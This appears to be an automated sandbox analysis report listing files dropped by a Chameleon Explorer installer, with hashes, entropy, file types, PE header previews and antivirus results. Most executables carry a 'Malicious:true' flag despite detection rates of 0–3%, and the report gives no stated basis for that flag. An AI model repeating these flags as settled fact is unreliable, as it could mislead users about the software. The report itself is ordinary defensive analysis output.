                                                                                                                                      SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):768032
                                                                                                                                      Entropy (8bit):6.537086415352977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                                                      MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                                                      SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                                                      SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                                                      SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):768032
                                                                                                                                      Entropy (8bit):6.537086415352977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                                                      MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                                                      SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                                                      SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                                                      SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1226272
                                                                                                                                      Entropy (8bit):5.8428341731794005
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                                                      MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                                                      SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                                                      SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                                                      SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1226272
                                                                                                                                      Entropy (8bit):5.8428341731794005
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                                                      MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                                                      SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                                                      SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                                                      SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1226272
                                                                                                                                      Entropy (8bit):5.8428341731794005
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                                                      MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                                                      SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                                                      SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                                                      SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\is-4Q1I9.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1226272
                                                                                                                                      Entropy (8bit):5.8428341731794005
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                                                      MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                                                      SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                                                      SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                                                      SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805400
                                                                                                                                      Entropy (8bit):6.529115621464912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                                                      MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                                                      SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                                                      SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                                                      SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmp, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\is-7RNBS.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):146536
                                                                                                                                      Entropy (8bit):5.3703743168809845
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
                                                                                                                                      MD5:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                                                      SHA1:0467FA8567B71F6E3A54D152D9EA77121C627798
                                                                                                                                      SHA-256:3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                                                                                                                                      SHA-512:FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....=^X.........."..........h................@......................................................@............... ...............@..\.... ..@.......................h4...p...............................`..(....................".......0.......................text...P........................... ..`.data...............................@....bss.....N...............................idata..@.... ......................@....didata......0......................@....edata..\....@......................@..@.tls.........P...........................rdata..m....`......................@..@.reloc.......p......................@..B.pdata..............................@..@.rsrc...............................@..@....................................@..@

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\is-89A92.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1185824
                                                                                                                                      Entropy (8bit):6.406882852477582
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                                                      MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                                                      SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                                                      SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                                                      SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\is-EV8UG.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4644456
                                                                                                                                      Entropy (8bit):6.624930231136082
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
                                                                                                                                      MD5:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      SHA1:940F504D835FC254602953495320BB92456177B9
                                                                                                                                      SHA-256:137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                                                                                                                                      SHA-512:015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....=^X................../.........(./......./...@...........................c.......G...@......@...................`M.......M..H....M...............F.h4....................................M.....................D.M......PM......................text...(X/......Z/................. ..`.itext..D0...p/..2...^/............. ..`.data...\...../......./.............@....bss....<z....0..........................idata...H....M..J...`0.............@....didata......PM.......0.............@....edata.......`M.......0.............@..@.tls....H....pM..........................rdata..].....M.......0.............@..@.rsrc.........M.......0.............@..@JCLDEBUG.D...@W..F...d:.............@..@........................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\is-FAU52.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):768032
                                                                                                                                      Entropy (8bit):6.537086415352977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                                                      MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                                                      SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                                                      SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                                                      SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\is-HQP5N.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1275416
                                                                                                                                      Entropy (8bit):5.811103517353428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                                                      MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                                                      SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                                                      SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                                                      SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\is-LI6V8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15091304
                                                                                                                                      Entropy (8bit):6.181292047546881
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
                                                                                                                                      MD5:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      SHA1:E642D694367CC98A8863D87FEC82E4CF940EB48A
                                                                                                                                      SHA-256:9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                                                                                                                                      SHA-512:01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f=^X..........#.........,E..............@.....................................p.....@..........@............... .......................`...p...@...B...0..|.......h4................................... ..(....................}..........|....................text............................. ..`.data....d.......f.................@....bss.........p...........................idata...p...`...r...L..............@....didata.|...........................@....edata.............................@..@.tls....x................................rdata..m.... .....................@..@.pdata..|....0.....................@..@.rsrc....B...@...B.................@..@JCLDEBUG.............&..............@..@........................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\unins000.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:InnoSetup Log Chameleon Explorer {96C45BE0-C1AA-41B3-B161-F331DBC29B84-, version 0x418, 52557 bytes, 405464\37\user\376, C:\Program Files (x86)\Chameleon Explorer\
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):52557
                                                                                                                                      Entropy (8bit):3.9174495073843554
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:4FYAxWNrPuxwK2BBnE9IuIuhqjulh9Lbr:0xkixl2BBnE9IuIuhk4T
                                                                                                                                      MD5:A0F710F566BB36346CC945ADBCC102A3
                                                                                                                                      SHA1:E2215C6ECE97E184AB441E2991F9B5D3AD08B687
                                                                                                                                      SHA-256:4EC09AAA226A0E12FD7E5F415FB43FBED30A520E5000E0445E30EA6112D1A4D2
                                                                                                                                      SHA-512:385A1785E73DDB00F686C28206B1D9753815E1F0F43CCFDA31B261677C448532A720C7365D9A903205E4C598E85044EF0B7B557D5BD4F0F79707CFC0F00E99BA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Inno Setup Uninstall Log (b)....................................{96C45BE0-C1AA-41B3-B161-F331DBC29B84-explorer}}................................................................................Chameleon Explorer......................................................................................................................M...%............................................................................................................................~................4.0.5.4.6.4......h.a.r.d.z......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r....................... ...........M..IFPS....A.......!.......................................................................................................................................................BOOLEAN..............TWIZARDPAGE....TWIZARDPAGE.........TCHECKBOX....TCHECKBOX.........TBUTTON....TBUTTON.........TLABEL....TLABEL.........TEXECWAIT.........TOBJECT....TOBJECT.........TCONTROL....TCONTROL..

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1185824
                                                                                                                                      Entropy (8bit):6.406882852477582
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                                                      MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                                                      SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                                                      SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                                                      SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Chameleon Explorer\unins000.msg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:InnoSetup messages, version 5.5.3, 221 messages (UTF-16), &About Setup...
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):22709
                                                                                                                                      Entropy (8bit):3.2704486925356004
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Q41EjXgkg3Sqf8sfr69FT0AKanzLYfMa1tzvL7Vzo+Fc51USQDztXfbKJUfvo:Q41Elvqf9r6fKVfMmRo+y1USQDztP3o
                                                                                                                                      MD5:79173DA528082489A43F39CF200A7647
                                                                                                                                      SHA1:AA253B477CE2BF9D886D07694CD5DDB7C7FE9EEC
                                                                                                                                      SHA-256:4F36E6BE09CD12E825C2A12AB33544744E7256C9094D7149258EA926705E8FFD
                                                                                                                                      SHA-512:C46EB9DD3D03A993FDC4F65AE2751ECFDCB1FB6E1FB69A119105FD40290CE5EC4427B04F813EED47415390689943D05B5432D4571B1ACA0CE37EE52391790D18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Inno Setup Messages (5.5.3) (u).....................................hX..........&.A.b.o.u.t. .S.e.t.u.p.........%.1. .v.e.r.s.i.o.n. .%.2.....%.3.........%.1. .h.o.m.e. .p.a.g.e.:.....%.4.....A.b.o.u.t. .S.e.t.u.p...Y.o.u. .m.u.s.t. .b.e. .l.o.g.g.e.d. .i.n. .a.s. .a.n. .a.d.m.i.n.i.s.t.r.a.t.o.r. .w.h.e.n. .i.n.s.t.a.l.l.i.n.g. .t.h.i.s. .p.r.o.g.r.a.m.....T.h.e. .f.o.l.l.o.w.i.n.g. .a.p.p.l.i.c.a.t.i.o.n.s. .a.r.e. .u.s.i.n.g. .f.i.l.e.s. .t.h.a.t. .n.e.e.d. .t.o. .b.e. .u.p.d.a.t.e.d. .b.y. .S.e.t.u.p... .I.t. .i.s. .r.e.c.o.m.m.e.n.d.e.d. .t.h.a.t. .y.o.u. .a.l.l.o.w. .S.e.t.u.p. .t.o. .a.u.t.o.m.a.t.i.c.a.l.l.y. .c.l.o.s.e. .t.h.e.s.e. .a.p.p.l.i.c.a.t.i.o.n.s.....T.h.e. .f.o.l.l.o.w.i.n.g. .a.p.p.l.i.c.a.t.i.o.n.s. .a.r.e. .u.s.i.n.g. .f.i.l.e.s. .t.h.a.t. .n.e.e.d. .t.o. .b.e. .u.p.d.a.t.e.d. .b.y. .S.e.t.u.p... .I.t. .i.s. .r.e.c.o.m.m.e.n.d.e.d. .t.h.a.t. .y.o.u. .a.l.l.o.w. .S.e.t.u.p. .t.o. .a.u.t.o.m.a.t.i.c.a.l.l.y. .c.l.o.s.e. .t.h.e.s.e. .a.p.p.l.i.c.a.t.i.o.n.s... .A.f.

                                                                                                                                      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer\Chameleon Explorer.lnk

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
